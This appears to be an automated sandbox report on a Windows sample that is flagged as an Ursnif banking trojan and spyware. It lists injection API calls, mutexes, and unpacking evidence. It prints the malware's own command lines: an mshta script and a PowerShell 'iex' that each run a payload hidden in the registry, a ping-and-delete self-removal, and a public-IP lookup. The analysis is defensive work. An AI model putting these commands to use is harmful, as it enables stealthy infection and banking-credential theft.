Source: C:\Windows\System32\control.exe	Code function: 21_2_00A39FC4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A33764
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A5137C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A51B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D27548
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D259E4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D2137C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D177A0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D21B4C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D03764
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D152D0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1DEE8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0847C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D09098
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D28448
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D11C44
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D20468
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0CFF8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1C400
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D14818
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D05420
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D09FC4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0C3E4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D065A8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D029B0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D291B0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1993C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D23D68
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D18974
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D12A90
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D29AA8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D0AAB4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D15AB4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D01638
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1220C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D05A1C
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D10DC8
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1B1D0
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1CDC4
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D3B5A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_037413FA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374B006

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: FpYf5EGDO9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FpYf5EGDO9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: FpYf5EGDO9.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_00401703 NtMapViewOfSection,
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset,
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C45CD1 GetProcAddress,NtCreateSection,memset,
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C49E79 NtMapViewOfSection,
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4B1E5 NtQueryVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4B080 NtMapViewOfSection,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A474E0 RtlAllocateHeap,NtQueryInformationProcess,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A570F8 NtCreateSection,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A48078 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A48844 NtWriteVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A43104 NtAllocateVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4B164 NtQueryInformationProcess,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3B964 NtReadVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A54200 NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3C3E4 NtSetContextThread,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A6B00B NtProtectVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D1B164 NtQueryInformationProcess,
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D24200 NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\System32\rundll32.exe	Code function: 31_2_000001B888D3B00B NtProtectVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_037407E8 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373B347 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374FBD1 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0373A63D memset,NtQueryInformationProcess,

Source: FpYf5EGDO9.exe, 00000000.00000003.457741081.0000000005EC4000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs FpYf5EGDO9.exe

Source: FpYf5EGDO9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20211123

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@33/20@11/7

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: FpYf5EGDO9.exe

Virustotal: Detection: 46%

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\FpYf5EGDO9.exe "C:\Users\user\Desktop\FpYf5EGDO9.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3sr4b0q.5pk.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C48F1B CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{CC8B2523-BB54-DEC2-A5C0-1FF2A9F4C346}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{149D3F5E-63E5-660B-8D88-47FA113C6BCE}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{ECAECFE4-5BDD-FE72-45E0-BF1249146366}
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7CCD0A5F-ABCA-0E60-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: pemahu
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: Regefiri
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: Xegixaze
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: \H
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: zijiwe
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: "Y?
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Command line argument: mecevituxe

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: FpYf5EGDO9.exe

Static PE information: More than 200 imports for KERNEL32.dll

Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: FpYf5EGDO9.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: FpYf5EGDO9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source:	Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
Source:	Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source:	Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4E9AC push 0B565A71h; ret
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4AFAF push ecx; ret
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4AC00 push ecx; ret
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4E62F push edi; retf
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_0042EA80 push ecx; mov dword ptr [esp], 00000000h
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021C5A54 push ds; ret
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BF050 push ebx; retf
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BED5D push edx; iretd
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021C3D79 push 12BFE4EFh; ret
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BFF72 push esp; iretd
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021BE769 push esi; iretd
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_021C2BBF push es; iretd
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_0374FECD push ecx; mov dword ptr [esp], 00000002h
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_03752D7B push ecx; ret

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401264 LoadLibraryA,GetProcAddress,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline

Source: initial sample

Static PE information: section name: .text entropy: 7.04723316599

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\i1aaekli.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4v5gswf4.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
